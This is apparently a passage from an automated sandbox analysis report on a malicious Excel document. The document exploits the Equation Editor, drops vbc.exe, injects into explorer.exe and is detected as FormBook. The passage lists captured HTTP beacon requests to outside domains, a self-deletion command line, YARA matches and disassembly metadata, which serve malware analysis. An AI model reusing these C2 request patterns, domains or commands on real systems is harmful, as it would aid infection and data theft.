type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-it
Nov 26, 2020 21:14:10.893650055 CET	606	IN	Data Raw: 65 6d 73 3a 73 74 61 72 74 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 2e 36 72 65 6d 7d 2e 61 63 74 69 6f 6e 7b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 41 39 41 39 41 39 3b 70 61 64 64 69 6e 67 3a 31 2e 32 72 65 6d 20 32 2e 35 Data Ascii: ems:start;margin-bottom:1.6rem}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-block;font-size:1.5rem;transition:border-color 0.2s ease-in}.action:hover{border-colo
Nov 26, 2020 21:14:10.893666983 CET	608	IN	Data Raw: 65 6e 74 2d 74 69 74 6c 65 22 3a 20 22 4e 6f 20 74 69 65 6e 65 73 20 70 65 72 6d 69 73 6f 20 70 61 72 61 20 61 63 63 65 64 65 72 20 61 20 65 73 74 61 20 70 c3 a1 67 69 6e 61 20 77 65 62 22 0a 20 20 7d 2c 0a 20 20 22 6b 6f 22 3a 20 7b 0a 20 20 20 Data Ascii: ent-title": "No tienes permiso para acceder a esta pgina web" }, "ko": { "title": " ", "content-title": " " }, "da": { "title": "Adgang
Nov 26, 2020 21:14:10.893682957 CET	609	IN	Data Raw: 95 e0 a5 8b 20 e0 a4 87 e0 a4 b8 20 e0 a4 b5 e0 a5 87 e0 a4 ac e0 a4 b8 e0 a4 be e0 a4 87 e0 a4 9f 20 e0 a4 a4 e0 a4 95 20 e0 a4 aa e0 a4 b9 e0 a5 81 e0 a4 82 e0 a4 9a 20 e0 a4 aa e0 a5 8d e0 a4 b0 e0 a4 be e0 a4 aa e0 a5 8d e0 a4 a4 20 e0 a4 95 Data Ascii: " }, "ja": { "title": "", "content-title": "
Nov 26, 2020 21:14:10.893692970 CET	609	IN	Data Raw: 6c 61 74 69 6f 6e 73 29 20 7b 0a 20 20 20 20 74 61 72 67 65 74 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 5b 64 61 74 61 2d 69 31 38 6e 3d 22 20 2b 20 69 64 20 2b 20 22 5d 22 29 3b 0a 20 20 20 20 69 66 20 28 Data Ascii: lations) { target = document.querySelector("[data-i18n=" + id + "]"); if (target != undefined) { target.innerHTML = translations[id]; } } // Replace title tage document.title = translations["title"]; // Replace langua
Nov 26, 2020 21:14:10.893701077 CET	609	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.22	49171	66.96.162.138	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 26, 2020 21:14:16.132878065 CET	610	OUT	GET /sqe3/?cB=M2gi/2rftereO9YfyWfvr6V5Ia0b0txn97j0jlakpXVUd1e6zNbyBzYXevWhAV4c0pce3g==&NreT=XJE0G4nHflj HTTP/1.1 Host: www.moveoneic.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 26, 2020 21:14:16.262269974 CET	611	IN	HTTP/1.1 302 Found Date: Thu, 26 Nov 2020 20:14:16 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 312 Connection: close Server: Apache/2 Location: https://www.moveoneic.com/sqe3/?cB=M2gi/2rftereO9YfyWfvr6V5Ia0b0txn97j0jlakpXVUd1e6zNbyBzYXevWhAV4c0pce3g==&NreT=XJE0G4nHflj Cache-Control: max-age=3600 Expires: Thu, 26 Nov 2020 21:14:16 GMT Accept-Ranges: bytes Age: 0 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 6f 76 65 6f 6e 65 69 63 2e 63 6f 6d 2f 73 71 65 33 2f 3f 63 42 3d 4d 32 67 69 2f 32 72 66 74 65 72 65 4f 39 59 66 79 57 66 76 72 36 56 35 49 61 30 62 30 74 78 6e 39 37 6a 30 6a 6c 61 6b 70 58 56 55 64 31 65 36 7a 4e 62 79 42 7a 59 58 65 76 57 68 41 56 34 63 30 70 63 65 33 67 3d 3d 26 61 6d 70 3b 4e 72 65 54 3d 58 4a 45 30 47 34 6e 48 66 6c 6a 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://www.moveoneic.com/sqe3/?cB=M2gi/2rftereO9YfyWfvr6V5Ia0b0txn97j0jlakpXVUd1e6zNbyBzYXevWhAV4c0pce3g==&NreT=XJE0G4nHflj">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.22	49172	85.10.195.227	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 26, 2020 21:14:21.416049957 CET	612	OUT	GET /sqe3/?cB=i8a2XrM6c4PzlxrBAf6zuAf3nKYqRmED7KfomvOZBUX2ic3/OKgutfqGct8PuPO2yhcJFA==&NreT=XJE0G4nHflj HTTP/1.1 Host: www.antillean-network.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 26, 2020 21:14:21.436963081 CET	613	IN	HTTP/1.1 404 Not Found Connection: close Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0 Pragma: no-cache Content-Type: text/html Content-Length: 1236 Date: Thu, 26 Nov 2020 20:14:21 GMT Server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 20 3c 61 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 66 66 3b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 69 74 65 73 70 65 65 64 74 65 63 68 2e 63 6f 6d 2f 65 72 72 6f 72 2d 70 61 67 65 22 3e 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 2f 61 3e 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;" href="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised that LiteSpe
Nov 26, 2020 21:14:21.436990976 CET	613	IN	Data Raw: 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 Data Ascii: ed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.22	49173	192.161.187.200	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 26, 2020 21:14:26.774002075 CET	614	OUT	GET /sqe3/?cB=ce2vMfxvjNzpIiuEEVRdBe9TyXbD+nO4E4YWLS1QBhRwWXpWwU+RSJ1ydcmIzRpEWYQ4mQ==&NreT=XJE0G4nHflj HTTP/1.1 Host: www.integratednourishment.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 26, 2020 21:14:26.931380987 CET	615	IN	HTTP/1.1 302 Moved Temporarily Server: nginx Date: Thu, 26 Nov 2020 20:14:26 GMT Content-Type: text/html Content-Length: 154 Connection: close Location: http://www.integratednourishment.com?cB=ce2vMfxvjNzpIiuEEVRdBe9TyXbD+nO4E4YWLS1QBhRwWXpWwU+RSJ1ydcmIzRpEWYQ4mQ==&NreT=XJE0G4nHflj Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.22	49174	104.16.16.194	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 26, 2020 21:14:32.007437944 CET	616	OUT	GET /sqe3/?cB=cV0NQ3cSoEjVqYMmg/VwqmhA8djIFQLMz29YYbqh0iCirm1PpN4CjJrzlAb4Rx9TAdAIgw==&NreT=XJE0G4nHflj HTTP/1.1 Host: www.gregoryrecommends.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 26, 2020 21:14:32.320785046 CET	617	IN	HTTP/1.1 302 Found Date: Thu, 26 Nov 2020 20:14:32 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Set-Cookie: __cfduid=de07a9064bc53e0f0489b012ffee72c6c1606421672; expires=Sat, 26-Dec-20 20:14:32 GMT; path=/; domain=.www.gregoryrecommends.com; HttpOnly; SameSite=Lax Location: http://www.gregoryrecommends.com/nopage_error.html CF-Ray: 5f8646ba1a1d05ed-FRA Access-Control-Allow-Origin: * Cache-Control: no-cache Vary: Accept-Encoding CF-Cache-Status: MISS Access-Control-Allow-Credentials: true Access-Control-Allow-Headers: DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Authorization Access-Control-Allow-Methods: GET, PUT, POST, DELETE, PATCH, OPTIONS cf-request-id: 06a7ca884d000005ed1a366000000001 Status: 302 Found X-Frame-Options: ALLOWALL X-Powered-By: Phusion Passenger Enterprise 6.0.2 X-Rack-Cache: miss X-Request-Id: 38afb9744787aa13a8ed15f003226fb5 X-Runtime: 0.133626 Server: cloudflare Data Raw: 37 34 0d 0a 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 59 6f 75 20 61 72 65 20 62 65 69 6e 67 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 72 65 67 6f 72 79 72 65 63 6f 6d 6d 65 6e 64 73 2e 63 6f 6d 2f 6e 6f 70 61 67 65 5f 65 72 72 6f 72 2e 68 74 6d 6c 22 3e 72 65 64 69 72 65 63 74 65 64 3c 2f 61 3e 2e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 74<html><body>You are being <a href="http://www.gregoryrecommends.com/nopage_error.html">redirected</a>.</body></html>
Nov 26, 2020 21:14:32.320821047 CET	617	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 2376 Parent PID: 584

General

Start time:	21:12:38
Start date:	26/11/2020
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase:	0x13fdc0000
File size:	27641504 bytes
MD5 hash:	5FB0A0F93382ECD19F5F499A5CAA59F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: EQNEDT32.EXE PID: 2536 Parent PID: 584

General

Start time:	21:12:57
Start date:	26/11/2020
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: vbc.exe PID: 532 Parent PID: 2536

General

Start time:	21:13:00
Start date:	26/11/2020
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\Public\vbc.exe'
Imagebase:	0xec0000
File size:	478720 bytes
MD5 hash:	FD09F4D0B2373B9634F2D8AD2F5C899D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2136258521.0000000003341000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2136258521.0000000003341000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2136258521.0000000003341000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.2136150916.0000000002554000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2136301403.00000000033BB000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2136301403.00000000033BB000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2136301403.00000000033BB000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Antivirus matches:	Detection: 29%, ReversingLabs
Reputation:	low

Chronological Activities

Analysis Process: vbc.exe PID: 2828 Parent PID: 532

General

Start time:	21:13:02
Start date:	26/11/2020
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	true
Commandline:	{path}
Imagebase:	0xec0000
File size:	478720 bytes
MD5 hash:	FD09F4D0B2373B9634F2D8AD2F5C899D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2170693732.00000000000F0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2170693732.00000000000F0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2170693732.00000000000F0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2170740872.0000000000180000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2170740872.0000000000180000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2170740872.0000000000180000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2170766828.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2170766828.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2170766828.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: explorer.exe PID: 1388 Parent PID: 2828

General

Start time:	21:13:04
Start date:	26/11/2020
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:
Imagebase:	0xffca0000
File size:	3229696 bytes
MD5 hash:	38AE1B3C38FAEF56FE4907922F0385BA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: ipconfig.exe PID: 3040 Parent PID: 1388

General

Start time:	21:13:16
Start date:	26/11/2020
Path:	C:\Windows\SysWOW64\ipconfig.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\ipconfig.exe
Imagebase:	0xf70000
File size:	27136 bytes
MD5 hash:	CABB20E171770FF64614A54C1F31C033
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2344836687.00000000002F0000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2344836687.00000000002F0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2344836687.00000000002F0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2344664416.0000000000080000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2344664416.0000000000080000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2344664416.0000000000080000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2344806052.00000000002C0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2344806052.00000000002C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2344806052.00000000002C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 2956 Parent PID: 3040

General

Start time:	21:13:20
Start date:	26/11/2020
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del 'C:\Users\Public\vbc.exe'
Imagebase:	0x4a370000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: vbc.exe PID: 532 Parent PID: 2536 vbc.exeCOMMON

Executed Functions

Function 00495E64, Relevance: 2.8, Strings: 2, Instructions: 256COMMON

Download Yara Rule

Strings

vR', xrefs: 0049617D
pp6, xrefs: 0049623A

Memory Dump Source

Source File: 00000004.00000002.2135487213.0000000000490000.00000040.00000001.sdmp, Offset: 00490000, based on PE: false

Similarity

API ID:
String ID: pp6$vR'
API String ID: 0-2690560719
Opcode ID: a5fffa24cab109da5dad5bfd7719ca718341f5496c409e298bf0747b64aff495
Instruction ID: 4fcc00f6f707bfe82b13ced3738b1dc64a666d5d26f025c45bd3284fe45dfb92
Opcode Fuzzy Hash: a5fffa24cab109da5dad5bfd7719ca718341f5496c409e298bf0747b64aff495
Instruction Fuzzy Hash: 0DA13B74E14209CFCF14CFA9C8809ADBBB6BF89310B25916AE805EB356D734E942CF54

Uniqueness

Uniqueness Score: -1.00%

Function 004934FA, Relevance: 1.7, Strings: 1, Instructions: 473COMMON

Download Yara Rule

Strings

TV?m, xrefs: 00493525

Memory Dump Source

Source File: 00000004.00000002.2135487213.0000000000490000.00000040.00000001.sdmp, Offset: 00490000, based on PE: false

Similarity

API ID:
String ID: TV?m
API String ID: 0-1724326450
Opcode ID: b16acc9a05635eefb1288255b57a0e49e9532961264c77e5ddf5839a792e05cd
Instruction ID: 01d34c0bc46fabd2a88f5eda50cdf077c0d2bb671906495e90406078a01327ed
Opcode Fuzzy Hash: b16acc9a05635eefb1288255b57a0e49e9532961264c77e5ddf5839a792e05cd
Instruction Fuzzy Hash: A922E2B4905228CFDB64CF64C844BE9BBB1BF4A315F2081EAD50AA7361CB749E85CF45

Uniqueness

Uniqueness Score: -1.00%

Function 004904E0, Relevance: .7, Instructions: 694COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2135487213.0000000000490000.00000040.00000001.sdmp, Offset: 00490000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca88c3f8b41774551de4764de4653c53e3b098514d0cb54fbe1b2ecf01d7491c
Instruction ID: f3fc94c2ba26b1b382e4e0166ecaff61fced865702c515075487f3a17e009ff5
Opcode Fuzzy Hash: ca88c3f8b41774551de4764de4653c53e3b098514d0cb54fbe1b2ecf01d7491c
Instruction Fuzzy Hash: A472A334A11219CFD714DB78C894F99B7B2BF8A304F1185E9D449AB360EB34AE85CF61

Uniqueness

Uniqueness Score: -1.00%

Function 00490094, Relevance: .7, Instructions: 689COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2135487213.0000000000490000.00000040.00000001.sdmp, Offset: 00490000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 917efac0f034d5e518b56a40727bc657b684cb00c5d2c4247e47911f4c235c68
Instruction ID: 63256e079c1dcc718d0bb902f86cd8c07bfead98675db02dc393de34b435f735
Opcode Fuzzy Hash: 917efac0f034d5e518b56a40727bc657b684cb00c5d2c4247e47911f4c235c68
Instruction Fuzzy Hash: 6162A334A11219CFD714DB78C894F99B7B2BF8A304F1189E9D449AB360DB34AE85CF61

Uniqueness

Uniqueness Score: -1.00%

Function 00492078, Relevance: .2, Instructions: 187COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2135487213.0000000000490000.00000040.00000001.sdmp, Offset: 00490000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e870b736bbe7aefa96987dd7c0c61695cd963b5c2936ef6e645689a1c5cd652b
Instruction ID: d222bcd5b7c45abf7519080b89b2b34a785b620cad7ffd3683ea495fa40907c3
Opcode Fuzzy Hash: e870b736bbe7aefa96987dd7c0c61695cd963b5c2936ef6e645689a1c5cd652b
Instruction Fuzzy Hash: 12712574E04219DFCF00CFE9C585AAEBFF2BF89300F248426D509AB259D7789982CB55

Uniqueness

Uniqueness Score: -1.00%

Function 0049F528, Relevance: 1.7, APIs: 1, Instructions: 222processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0049F704

Memory Dump Source

Source File: 00000004.00000002.2135487213.0000000000490000.00000040.00000001.sdmp, Offset: 00490000, based on PE: false

Similarity

API ID: CreateProcess
String ID:
